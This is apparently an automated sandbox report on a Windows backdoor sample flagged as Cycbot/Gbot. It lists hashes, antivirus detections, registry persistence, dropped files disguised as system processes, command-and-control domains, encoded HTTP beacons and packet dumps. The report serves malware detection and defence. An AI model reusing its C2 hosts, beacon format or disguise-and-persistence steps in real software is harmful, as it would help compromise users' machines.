Analysis Date: 2014-12-19 16:56:25
MD5: 1e6e9a173550017ea0aba98a255eb960
SHA1: f6543e17d0b08d17c196b1e4630fe15475c8224b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 6197253569000ef2636a058b04f92a91 sha1: 9bd07cd81433eb4fd6432e4c6ce1ea9a95d6f994 size: 105984
Section .rdata md5: a68ff4ef97fa171610bacfe645ed46ef sha1: 6345056c5528e4bd9802148e37b873787b4db7b2 size: 1024
Section .data md5: d2d39712c202fbbc1cddb46b26287fa2 sha1: a4d81f547d43e24e8167ef6cb17180e0cab39456 size: 70144
Section .reloc md5: 4a9e6d13b2b960d50e1bcbf951ada207 sha1: 23f117e30c37799fb14e8e658d46276f8fc2a263 size: 1024
Timestamp: 2005-11-26 07:59:00
PEhash: 3e041bf39703d2d6945cc0cc07b96c996f085821
IMPhash: 06a9d0c73a32942ddb8292199f42057a
AV 360 Safe: Gen:Heur.Conjar.5
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Heur.Conjar.5
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV BullGuard: Gen:Heur.Conjar.5
AV CA (E-Trust Ino): Win32/Cycbot.G!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-1367
AV Dr. Web: BackDoor.Gbot.73 - infected, incurable
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Kryptik.TFW
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Rogue:W32/OpenCloud.A
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.n
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Rising: Backdoor.Win32.Cycbot.a
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen7
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): SScope.Malware-Cryptor.Maxplus.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File PIPE\lsarpc
Creates File \Device\Afd\Endpoint
Creates File C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex WininetConnectionMutex
Creates Mutex c:!documents and settings!administrator!cookies!
Creates Mutex {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS 127.0.0.1
Winsock DNS healthylifenow.com
Winsock DNS yourmediaresources.com
Winsock DNS onlinesearchdb.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNS healthylifenow.com
Type: A
208.109.208.147
DNS zonedg.com
Type: A
141.8.225.80
DNS zonedg.com
Type: A
141.8.225.80
DNS yourblogresources.com
Type: A
DNS onlinesearchdb.com
Type: A
DNS yourmediaresources.com
Type: A
HTTP GET http://healthylifenow.com/templates/7349/images/header_logo.jpg?v87=49&tq=gJ4WK%2FSUh7TFkER8oY%2BQtMWTUj26kJH7yZJSPbqVybhqtUn5CGFATA%3D%3D
User-Agent: mozilla/2.0
HTTP POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP 192.168.1.1:1031 ➝ 208.109.208.147:80
Flows TCP 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP 192.168.1.1:1034 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f74656d 706c6174 65732f37   GET /templates/7
0x00000010 (00016)   3334392f 696d6167 65732f68 65616465   349/images/heade
0x00000020 (00032)   725f6c6f 676f2e6a 70673f76 38373d34   r_logo.jpg?v87=4
0x00000030 (00048)   39267471 3d674a34 574b2532 46535568   9&tq=gJ4WK%2FSUh
0x00000040 (00064)   3754466b 4552386f 59253242 51744d57   7TFkER8oY%2BQtMW
0x00000050 (00080)   54556a32 366b4a48 37795a4a 53506271   TUj26kJH7yZJSPbq
0x00000060 (00096)   56796268 7174556e 35434746 41544125   VybhqtUn5CGFATA%
0x00000070 (00112)   33442533 44204854 54502f31 2e300d0a   3D%3D HTTP/1.0..
0x00000080 (00128)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000090 (00144)   650d0a48 6f73743a 20686561 6c746879   e..Host: healthy
0x000000a0 (00160)   6c696665 6e6f772e 636f6d0d 0a416363   lifenow.com..Acc
0x000000b0 (00176)   6570743a 202a2f2a 0d0a5573 65722d41   ept: */*..User-A
0x000000c0 (00192)   67656e74 3a206d6f 7a696c6c 612f322e   gent: mozilla/2.
0x000000d0 (00208)   300d0a0d 0a                           0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 6c537225 32466525 32425635   2BsqlSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53505425   ij%2B8yjYvEaSPT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 20737563 68206669   lose.... such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.
@.
....
a../
.F
@y@@
.

080904b0
1.0.0.1
1508
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
^^^^^^
^^^^^}}}}}}}}}}}}}}
<<<<<<<<<<<<<<<<<
==~~~~~
======================
__________
---------
--------*****
,,,,,,,
::::::::::
???????
......
........
...........
"`@~<}
"""""""
"""""""""
((((((((((((((((((
]]::::::::::
}}}}}}
}}}}}}}}
}}}}}}}}}
@-$`@~
$$$$$$$$$
**************
&&&&&&&&&
#######
%%%%%%%%%%
+?	\+ 
++++++++
++++++++++++
			||||
			////////
									
0000000]]]]
^^^^^^^^^^^^000000000000000
000dddd
07K( @~
 0^d1V
"``0_h
0!pWB:
11_0iFF|`?
1m`^+0,
1r8L^}
,` 1ri
]2]6In
. `;27
2888888wwwwwww
?\!2pYYp
-2SNu$`
31Qqqnz
333WWW
3.a8mU
}3*jng
.3-[)m<
3Mp{+p
3~. `n=
}3n n@
4;]`3f
((((((444444444
4F?8oz
4i+D1(
[]4>K;A
5555>>>>>>
55555555&&&&#
5e"OLl
;5F)Cj
5._H5&
=5(KJo
5oN<1K
5}Sydd
5tzAqp_dz
5*yr"|
6     
613h+_
,@6_3T
66666666
666666666
66666SS008
^{6FVv
6iK'!v3<
6{vXES=
@@6w( @
71C#d4:?
:76~LV"
774K#3%
777777
8<b{m"
,8GFe3
8gHcPVZ
8 NS)!
@8`TM+
 `8TZv
999======
99999999999999999
:9Ao#61
{9jf%|
 `9Klt
9.>R9/
@A=0|-
A0g\:3q,
AAAAAA
aaaaaaaaaaaaaa
A"aZJ}R#
AcaeXO
Ahsa41
.;ANsO
as)>;S
/aW^v~
A/zonn
B0K?B)
ba8+n&
BBBBBBB
bbbbbbbbbbb
BBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBB
` b-G:
@"`@~b;mZ
^boG><
b\;RA:
Bt&PFWN
BuHZu|
;bY/IY
CCCCCCChhh
CEGl2N4
 cigBZ
ClipCursor
Co8, `
_%>c^p
CRcU/x
CreatePopupMenu
CrUUUUUU
c> `@w
Cz6]fq
@.data
DDDDDD
dddddddAAAAAA
DDDDDDDDyyyyy
DDDDDDttttttttQQQQQ
dd^^++++++++gggg
dd+|w2
DestroyMenu
]\D`j{
	@Dj|r
>D;"#O
.dOY{	U
d{QX!-)%
dTK=)5
+Du.`@
DuplicateHandle
Du &,y
DveM!( 
DwR"+taTL
!DyH|%
` e*  
E	0VRk
ea1w#c
__EEEEEE
eFe||+(
. `EI[
EnumResourceNamesW
eq_cKB
=Ez@'.
ffffff
`F[G  `
FindClose
FindFirstFileA
FindResourceExA
FindWindowA
FlushInstructionCache
#f&` M
fU0h.j'
FW5,`@
,  Fx"
` FYOX
f(zU*F
;G1pdp
Gb?< `
g:EENa
GetDesktopWindow
GetModuleFileNameW
G -fdi
##GGG@@@@
gggggg
gJ-yZm
gl5?v`
GN1v	-
/GPHSp
GPPKrk
GQi4	'
g`r+n=
G{U`%B
GYHi)U
{GY$)q
H$@` `
H:D>2J
 HfTY9AQ
HFV, `
HGvuO?
Hn=:==
:hvGuN
Hz{[6n
"`@i4c
i	5\HU.\
`@I7v1
iCNc-e
IFeM1e
-IFT>JM
[[[[[II9
IIIIIIII
iiiiiiiii
IIIIIIIIIIIIIIII
IIIIIIIxxx
IIIwwwwww
IkT@szxo
:@IlA)
`@%i\NaSe
i]nCfZ
[Ix^2u
*` j0^
J=3Dz+^6h
j3	t>T
 @})J4J
?jC9cA
JJ"""""""
JJJJJJ
JJJJJJ:::::::
jjjjjjjjj________
!jL*y&[
jNUzvPID
JTu)5!k
----------K
k ;(1s
K(  4Wy?
KERNEL32.dll
kITOpn1rNf
KKKKKKK
kkkkkkkk
kkkt(((((
Kl)y~o
@K?Ml;
kppppppppll;
K}R<<}
?K;Z7I"
@ l$@ 
*` 	l/
l\b) @
Lddddddd
 `"  LE
ljMy'69=$
L<}k9f=B
lkXx4Sm
(((((((lllllll
`@L[nw
	LQ64d.
:L_Tkaj7iq
lv8My!H
@`+LVC
>\>m{%
!,M?\?
MapViewOfFile
`mG7<.
MIlb>|
+ml~ 0
mm_<kW
mmmmmmmm
MMMMMMMMMMMM
MMMMYYY8777777777777777
 mNG'_P;]
 n{#@;
NdrComplexArrayFree
'nG%vt
nkds<y7lU
;NkK$` A<
nnnnnnnn
nnnnnnnnn
NNNNNNNNN
nnnnnnnnnnn'
NNNNNNNNNNN
}}}}}}}}}nnnnnnnnnnnnn
NNNNNNNNNNNNNNNNNNNNYYY@@@zz
nP>2kr
nRRRRRRR
nt.8qY
NX^x{!M
/o6[gc
oDt|.`
~ok8%S
OOOO__
OOOOOOOOOOOO
ooooooooooooo
OPU#-K
O<V,` 
?Ov>6O
*`@ozva
"` p& 
p:::::::
pa8[]X3
>\pDNr<zF
P!dWq.
p^e. `
p}F>^*
p-G_|	
/P;-ghl
=Ph$<8(?7
pjS]v_
@Po>Wj
|||||||PP
::::PPPPPP
PPPPPPPPP
PPPPPPPPPPP
PPPPPPPPPPPPPPP
+p=Vam
``p~yT
=^_\Q|
?  @Q49
q4IP}?
	Q^9]0n
Q@iog$
Q%N~&7
Qnlf;<
?_qOb	l*89
qqbbbbb
.q\Qf&:
,,,,,,QQQQQQQQ
]q^U\Z
qVp<Kx
r~~~~~
@ R2h+
@r2K@R={
|r8.H'y
`rb( @
RB}n  `
`.rdata
RedrawWindow
.reloc
~r{hso
 @~R!k 
RPCRT4.dll
r"`@RG=
rrr99999999999
rrrrrr
RRRRRRRRRRR))
RRRRVVVVVVVV
RS*@`{
 `rsL,
RtA[(`@|
@ R$` w9
rwETbj
rW	Y9|^
Sbbbbbbb
?Sd5yltO
SetEnvironmentVariableW
SHELL32.dll
Shell_NotifyIconA
@S![Mq6
sssssAAAA
/	S%vu
;s?Y|)
}s[Yy5NA
TD0x%a
!This program cannot be run in DOS mode.
timeEndPeriod
tnnnnnnn8888
TQ?iA]
TrackPopupMenuEx
TS[C(a
TT					
/&tUPW
%\U6	.
u"%eX_
`@U;fK
+uMAvU
UnmapViewOfFile
u-P4w0
USER32
/u~tQHfk
UuidCreate
UUUUUUUUUUUUUUUUUUUUU
uuuuuZJJJJJJJJJJJJJ
Ux^Ss<
ux)$zI
u[YyD]
/v5ErH
#V_6Ky
\V/f8?)
^VJMagG3
VJR-E>
vml"``
`/|vMlD&
Vtx'0)
 \W(_1
$wBO/7
 wHhh8
WINMM.dll
wl?tI/n8(
W@N_P!
W>NW& 
w`Q!T>
W(S~!^p>(c:
wwEEEO
wwwwwwwww
wwwwwwwwwwwwww
 wwwwwwwwwwwwwwww
@ X;0r 
Xf; @ U
]XG8C%
	\<Xl7
X))))mmmmmmmmmmmmmm
>XSxpFIp
<<XX+++
******XXXXXXXXgggggggg######
XXXXXXXXXX
 @Y2o4
`@Y3>o
``'Y8n
#Y9^`C.
@ `}yA
>yg3IU
y[Md)7Ut"
^;Y!n1x
y(qb;v
 `@Y*``T
yUUUUUUH
]Yx[5_F
yYGL~k
YYYYYYYYYYYYY
.yZ{Zz
]Z7OQ`
]Zbh79
z_eWE7
Zfiimo%
ZGf#T	1S
zjtYK*
<%Z'Mc
zYTtkUM